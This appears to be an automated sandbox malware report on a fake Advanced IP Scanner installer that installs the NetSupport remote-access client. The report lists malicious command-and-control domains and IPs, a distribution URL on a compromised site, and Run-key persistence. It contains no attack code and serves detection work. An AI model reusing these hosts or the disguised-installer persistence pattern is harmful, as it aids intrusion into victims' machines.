C:\Program Files (x86)\Advanced IP Scanner\is-075U6.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-0N1O0.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-0TGAP.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-133UG.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-2K0TF.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-2U0U8.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-3CKII.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-3UOHG.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-43K8A.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-4OBJP.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-6E54C.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-6IECG.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-6P215.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-70A69.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-7BDCE.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-7UFVB.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-806EH.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-8A8B0.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-8I1NP.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-8T81V.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-95T15.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-9LCE6.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-A5E7F.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-BLUTK.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-BOBPK.tmp	3%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-BQO9P.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-C54PL.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-D0K3T.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-DS1TD.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-EU182.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-FPRGF.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-FUMI5.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-GFAIP.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-HN5GF.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-INF7O.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-IO07H.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-KE7IL.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-L306R.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-LNG1F.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-LNMM3.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-MH6KB.tmp	0%	ReversingLabs

Source	Detection	Scanner	Label
http://www.uninetutility.com/update)	0%	Avira URL Cloud	safe
http://151.236.16.15/fakeurl.htm	0%	Avira URL Cloud	safe
http://www.uninetutility.comQV	0%	Avira URL Cloud	safe
http://www.uninetutility.com	0%	Avira URL Cloud	safe
http://www.macrovision.com0	0%	Avira URL Cloud	safe
http://199.188.200.195/fakeurl.htm	0%	Avira URL Cloud	safe
http://www.radmin.com	0%	Avira URL Cloud	safe
http://www.uninetutility.com/update	0%	Avira URL Cloud	safe
http://www.uninetutility.com/support	0%	Avira URL Cloud	safe
http://crl.microH	0%	Avira URL Cloud	safe
http://www.advanced-ip-scanner.com0	0%	Avira URL Cloud	safe
http://crl.microsoftc	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
payiki.com	151.236.16.15	true	true	unknown
geo.netsupportsoftware.com	104.26.0.231	true	false	high
anyhowdo.com	199.188.200.195	true	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://151.236.16.15/fakeurl.htm	true	Avira URL Cloud: safe	unknown
http://geo.netsupportsoftware.com/location/loca.asp	false		high
http://199.188.200.195/fakeurl.htm	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.netsupportsoftware.com	powershell.exe, 00000004.00000002.1657069390.0000000005659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000562D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.4.dr	false		high
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU	KC0uZWwr8p.exe	false		high
http://geo.netsupportsoftware.com/qc	client32.exe, 00000006.00000002.3146712251.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp	false		high
http://%s/testpage.htmwininet.dll	powershell.exe, 00000004.00000002.1657069390.000000000581E000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmp	false		high
http://geo.netsupportsoftware.com/location/loca.aspF	client32.exe, 00000006.00000003.1875803246.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3147138896.0000000002F06000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.uninetutility.com	KC0uZWwr8p.exe, 00000000.00000003.1789516168.0000000003111000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.uninetutility.com/support	KC0uZWwr8p.exe, 00000000.00000003.1789516168.00000000030ED000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000002.00000003.1782320262.0000000002FED000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://geo.netsupportsoftware.com/location/loca.aspD	client32.exe, 00000006.00000002.3140062233.0000000000750000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000003.1876001809.0000000000731000.00000004.00000020.00020000.00000000.sdmp	false		high
http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)	client32.exe, 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.1674299523.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.1758015972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	false		high
http://ocsp.sectigo.com0	powershell.exe, 00000004.00000002.1657069390.0000000005659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.pci.co.uk/supportsupport	client32.exe, 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.1674375162.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.1758048452.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp	false		high
http://www.uninetutility.com/update	KC0uZWwr8p.tmp, 00000002.00000003.1782320262.0000000002FFC000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://qt-project.org/xml/features/report-whitespace-only-CharData	is-LNG1F.tmp.2.dr	false		high
https://contoso.com/License	powershell.exe, 00000004.00000002.1675819227.0000000006868000.00000004.00000800.00020000.00000000.sdmp	false		high
http://xml.org/sax/features/namespaceshttp://xml.org/sax/features/namespace-prefixeshttp://trolltech	is-LNG1F.tmp.2.dr	false		high
http://127.0.0.1RESUMEPRINTING	client32.exe, 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.1674299523.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.1758015972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	false		high
http://%s/testpage.htm	powershell.exe, 00000004.00000002.1657069390.000000000581E000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmp	false		high
http://geo.netsupportsoftware.com/location/loca.aspP	client32.exe, 00000006.00000003.1875925880.0000000002EE4000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3146995488.0000000002EE4000.00000004.00000020.00020000.00000000.sdmp	false		high
http://xml.org/sax/features/namespace-prefixes	is-LNG1F.tmp.2.dr	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	powershell.exe, 00000004.00000002.1657069390.0000000005659000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.uninetutility.com/update)	KC0uZWwr8p.exe, 00000000.00000003.1789516168.00000000030FC000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://%s/fakeurl.htm	client32.exe, client32.exe, 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmp	false		high
http://geo.netsupportsoftware.com/location/loca.aspL	client32.exe, 00000006.00000003.1875925880.0000000002EE4000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3146995488.0000000002EE4000.00000004.00000020.00020000.00000000.sdmp	false		high
http://geo.netsupportsoftware.com/location/loca.aspf	client32.exe, 00000006.00000003.1875925880.0000000002EE4000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3146995488.0000000002EE4000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.thawte.com/ThawteTimestampingCA.crl0	KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.0000000005659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000564F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.4.dr	false		high
http://www.uninetutility.comQV	KC0uZWwr8p.tmp, 00000002.00000003.1782320262.0000000003011000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore6lB	powershell.exe, 00000004.00000002.1657069390.0000000004E01000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.remobjects.com/ps	KC0uZWwr8p.exe, 00000000.00000003.1293120278.000000007EF3B000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.exe, 00000000.00000003.1292506681.00000000035A0000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000002.00000000.1295073878.0000000000B21000.00000020.00000001.01000000.00000004.sdmp	false		high
https://contoso.com/	powershell.exe, 00000004.00000002.1675819227.0000000006868000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000004.00000002.1675819227.0000000006868000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.innosetup.com/	KC0uZWwr8p.exe, 00000000.00000003.1293120278.000000007EF3B000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.exe, 00000000.00000003.1292506681.00000000035A0000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000002.00000000.1295073878.0000000000B21000.00000020.00000001.01000000.00000004.sdmp	false		high
https://sectigo.com/CPS0D	powershell.exe, 00000004.00000002.1657069390.0000000005659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.macrovision.com0	KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.netsupportschool.com/tutor-assistant.asp11(	client32.exe, 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.1674375162.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.1758048452.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000004.00000002.1657069390.0000000004E01000.00000004.00000800.00020000.00000000.sdmp	false		high
http://geo.netsupportsoftware.com/location/loca.asph	client32.exe, 00000006.00000003.1875905271.0000000002F86000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000003.1875803246.0000000002F06000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.netsupportschool.com/tutor-assistant.asp	client32.exe, 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.1674375162.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.1758048452.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000004.00000002.1675819227.0000000006868000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.pci.co.uk/support	client32.exe, 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.1674375162.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.1758048452.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp	false		high
https://sectigo.com/CPS0	powershell.exe, 00000004.00000002.1657069390.0000000005659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000004.00000002.1657069390.0000000004F56000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000004.00000002.1657069390.0000000004F56000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000004.00000002.1657069390.0000000004F56000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microH	powershell.exe, 00000004.00000002.1654538117.00000000030F7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.thawte.com0	KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.0000000005659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000564F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.4.dr	false		high
http://xml.org/sax/features/namespaces	is-LNG1F.tmp.2.dr	false		high
https://contoso.com/Icon	powershell.exe, 00000004.00000002.1675819227.0000000006868000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.radmin.com	KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp, is-ATTN2.tmp.2.dr	false	Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	powershell.exe, 00000004.00000002.1657069390.0000000005659000.00000004.00000800.00020000.00000000.sdmp	false		high
http://127.0.0.1	client32.exe, client32.exe, 00000008.00000002.1674299523.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.1758015972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	false		high
http://www.symauth.com/cps0(	KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.0000000005617000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000581E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.00000000055F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp, PCICHEK.DLL.4.dr	false		high
https://github.com/Pester/Pester	powershell.exe, 00000004.00000002.1657069390.0000000004F56000.00000004.00000800.00020000.00000000.sdmp	false		high
http://geo.netsupportsoftware.com/	client32.exe, 00000006.00000002.3146712251.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.microsoftc	powershell.exe, 00000004.00000002.1711196700.00000000099B2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://geo.netsupportsoftware.com/location/loca.asplbV	client32.exe, 00000006.00000002.3140062233.0000000000750000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000003.1876001809.0000000000731000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	powershell.exe, 00000004.00000002.1657069390.0000000005659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://geo.netsupportsoftware.com/location/loca.aspPV	client32.exe, 00000006.00000003.1875803246.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3147138896.0000000002F06000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.advanced-ip-scanner.com0	KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000002.00000002.1786562154.0000000000FDC000.00000004.00000010.00020000.00000000.sdmp, is-MH6KB.tmp.2.dr, is-LNG1F.tmp.2.dr	false	Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.symauth.com/rpa00	KC0uZWwr8p.tmp, 00000002.00000003.1770327739.0000000005AE4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.0000000005617000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000581E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.00000000055F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp, PCICHEK.DLL.4.dr	false		high
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	powershell.exe, 00000004.00000002.1657069390.0000000005659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://qt-project.org/xml/features/report-start-end-entity	is-LNG1F.tmp.2.dr	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000004.00000002.1657069390.0000000004F56000.00000004.00000800.00020000.00000000.sdmp	false		high
http://trolltech.com/xml/features/report-start-end-entity	is-LNG1F.tmp.2.dr	false		high
http://trolltech.com/xml/features/report-whitespace-only-CharData	is-LNG1F.tmp.2.dr	false		high
http://geo.netsupportsoftware.com/location/loca.asp(	client32.exe, 00000006.00000003.1875925880.0000000002EE4000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3146995488.0000000002EE4000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
151.236.16.15	payiki.com	European Union	29802	HVC-ASUS	true
104.26.0.231	geo.netsupportsoftware.com	United States	13335	CLOUDFLARENETUS	false
199.188.200.195	anyhowdo.com	United States	22612	NAMECHEAP-NETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1552424
Start date and time:	2024-11-08 19:14:01 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	KC0uZWwr8p.exe renamed because original name is a hash value
Original Sample Name:	7b6e6212a6d13800282bd2cb362c2a311d89e543.exe
Detection:	MAL
Classification:	mal60.rans.spre.troj.evad.winEXE@10/299@3/3
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 73% Number of executed functions: 188 Number of non-executed functions: 221
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 7320 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: KC0uZWwr8p.exe

Simulations

Behavior and APIs

Time	Type	Description
13:15:54	API Interceptor	8504880x Sleep call for process: client32.exe modified
19:15:23	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run NetUtilityApp C:\Users\user\AppData\Roaming\SystemUtil\client32.exe
19:15:31	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run NetUtilityApp C:\Users\user\AppData\Roaming\SystemUtil\client32.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
151.236.16.15	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	http://151.236.16.15/fakeurl.htm
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	http://151.236.16.15/fakeurl.htm
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	http://151.236.16.15/fakeurl.htm
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	http://151.236.16.15/fakeurl.htm
	Advanced_IP_Scanner_2.5.4594.12.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	http://151.236.16.15/fakeurl.htm
	Advanced_IP_Scanner_2.5.4594.12.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	http://151.236.16.15/fakeurl.htm
	https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	http://151.236.16.15/fakeurl.htm
104.26.0.231	hkpqXovZtS.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	file.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	qvoLvRpRbr.msi	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	EMX97rT0GX.msi	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	Support_auto.msi	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	information_package.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader, Stealc, Vidar	Browse	geo.netsupportsoftware.com/location/loca.asp
	updates.js	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
199.188.200.195	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	http://199.188.200.195/fakeurl.htm
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	http://199.188.200.195/fakeurl.htm
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	http://199.188.200.195/fakeurl.htm
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	http://199.188.200.195/fakeurl.htm
	Advanced_IP_Scanner_2.5.4594.12.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	http://199.188.200.195/fakeurl.htm
	Advanced_IP_Scanner_2.5.4594.12.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	http://199.188.200.195/fakeurl.htm
	https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	http://199.188.200.195/fakeurl.htm

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
geo.netsupportsoftware.com	72BF1aHUKl.msi	Get hash	malicious	NetSupport RAT	Browse	172.67.68.212
	hkpqXovZtS.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.0.231
	file.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.1.231
	file.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.1.231
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	172.67.68.212
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	172.67.68.212
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	172.67.68.212
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	104.26.1.231
	Advanced_IP_Scanner_2.5.4594.12.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	104.26.1.231
payiki.com	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	151.236.16.15
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	151.236.16.15
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	151.236.16.15
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	151.236.16.15
	Advanced_IP_Scanner_2.5.4594.12.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	151.236.16.15
	Advanced_IP_Scanner_2.5.4594.12.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	151.236.16.15
	https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	151.236.16.15
anyhowdo.com	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	199.188.200.195
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	199.188.200.195
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	199.188.200.195
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	199.188.200.195
	Advanced_IP_Scanner_2.5.4594.12.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	199.188.200.195
	Advanced_IP_Scanner_2.5.4594.12.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	199.188.200.195
	https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	199.188.200.195

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NAMECHEAP-NETUS	Play-Audio_Vmail_Ach Statement Credi....html	Get hash	malicious	HtmlDropper	Browse	199.188.200.234
